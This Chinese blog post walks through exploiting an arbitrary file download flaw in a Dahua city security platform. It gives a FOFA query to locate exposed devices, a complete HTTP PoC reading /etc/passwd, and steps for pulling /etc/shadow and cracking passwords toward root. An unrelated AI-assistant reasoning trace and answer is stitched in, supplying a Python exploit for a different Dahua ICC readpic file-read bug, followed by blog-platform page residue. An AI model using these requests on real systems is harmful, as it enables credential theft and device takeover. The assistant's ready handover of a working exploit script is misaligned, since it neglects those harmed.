漏洞复现--大华城市安防系统平台任意文件下载

目录

免责声明:

一:漏洞描述

二:漏洞影响版本

三:网络空间测绘查询

四:漏洞复现

五:漏洞利用

六:修复方案


免责声明:

文章中涉及的漏洞均已修复,敏感信息均已做打码处理,文章仅做经验分享用途,切勿当真,未授权的攻击属于非法行为!文章中敏感信息均已做多层打马处理。传播、利用本文章所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任,一旦造成后果请自行承担!

一:漏洞描述

大华城市安防监控系统平台管理存在任意文件下载漏洞,攻击者通过漏洞可以下载服务器上的任意文件。

二:漏洞影响版本

-大华城市安防系统

三:网络空间测绘查询

fofa语句:

app="dahua-DSS"

image.png

四:漏洞复现

POC:

GET /portal/attachment_downloadByUrlAtt.action?filePath=file:///etc/passwd HTTP/1.1
Host: ip:port
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1

image.png


 

image.png


成功读取etc/passwd

五:漏洞利用

用户密码存放在etc/shadow下,读取etc/shadow
 

image.png


拿去cmd解密
guest
 

image.png


ftp
 

image.png


运气好的话root密码可以破解。
点到为止,拿到密码后可以干什么懂得都懂,这里也是不演示了

六:修复方案

自行查询厂商发布补丁

<think>好的,我现在需要帮助用户了解大华智能物联ICC综合管理平台readpic接口的任意文件读取漏洞的利用方法,包括具体的POC。首先,我得回顾用户提供的三个引用内容,看看里面有没有相关的技术细节。 根据引用1,漏洞存在文件读取问题,攻击者可以获取敏感信息。引用2提到漏洞位于readpic接口,未经身份验证的攻击者可以利用。引用3则指出该平台的技术架构,漏洞会导致敏感信息泄露,并提到了POC的存在。所以,我需要整合这些信息,给出一个清晰的利用步骤。 接下来,我应该先描述漏洞的基本情况,比如漏洞编号QVD-2023-45063,影响版本,漏洞位置在readpic接口。然后说明漏洞成因,可能是未对用户输入做严格过滤,导致路径遍历。 然后,利用过程需要分步骤:环境搭建、漏洞验证、构造请求、利用路径遍历读取文件。在构造请求时,需要明确请求方法(GET)、接口路径,以及如何利用参数进行目录穿越,比如../../../../etc/passwd。同时要提到不同系统的文件路径差异,比如Windows和Linux。 关于POC部分,用户可能需要具体的代码示例,比如用Python的requests库发送GET请求,并处理响应。这时候需要确保代码正确,并提醒用户注意测试环境的安全性,避免违法操作。 最后,生成相关问题,覆盖漏洞修复、影响版本、类似漏洞原理、企业防范措施等,这样用户如果有进一步的问题,可以继续探索。 需要检查是否所有技术细节都准确,比如漏洞接口的路径是否正确,参数是否正确,以及是否引用了正确的来源。同时,确保回答结构清晰,分步骤说明,并附上代码示例,符合用户的要求。</think>### 大华ICC readpic接口任意文件读取漏洞利用方法 #### 漏洞背景 大华ICC智能物联综合管理平台`readpic`接口因未对文件路径参数进行严格过滤,攻击者可通过构造特殊路径实现任意文件读取,导致敏感信息泄露(如系统配置文件、密码文件等)[^2][^3]。漏洞编号为**QVD-2023-45063**。 --- #### 漏洞利用步骤(POC) **1. 环境搭建** - 受影响版本:大华ICC智能物联综合管理平台特定版本(需参考官方公告) - 复现环境:使用Docker搭建测试平台或存在漏洞的真实设备(需授权)[^3]。 **2. 漏洞验证** 向目标系统发送以下HTTP请求,尝试读取`/etc/passwd`(Linux系统)或`C:\Windows\win.ini`(Windows系统): ```http GET /emap/device/point_add/img/img?file=../../../../../../../../etc/passwd HTTP/1.1 Host: [目标IP]:[端口] User-Agent: Mozilla/5.0 Connection: close ``` **3. 关键参数说明** - **接口路径**:`/emap/device/point_add/img/img` - **参数`file`**:通过路径遍历(`../../`)跳转至目标文件路径。 **4. 利用过程** - **构造恶意请求**: 使用`curl`或Python脚本发送请求: ```python import requests url = "http://目标IP:端口/emap/device/point_add/img/img" params = { "file": "../../../../../../../../etc/passwd" } response = requests.get(url, params=params) print(response.text) ``` - **结果判断**: 若返回`200 OK`且包含系统文件内容,则漏洞存在。 --- #### 防御建议 1. 升级至官方修复版本。 2. 对`file`参数进行规范化检查,过滤`../`等特殊字符。 3. 限制文件访问权限至必要目录[^1]。 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值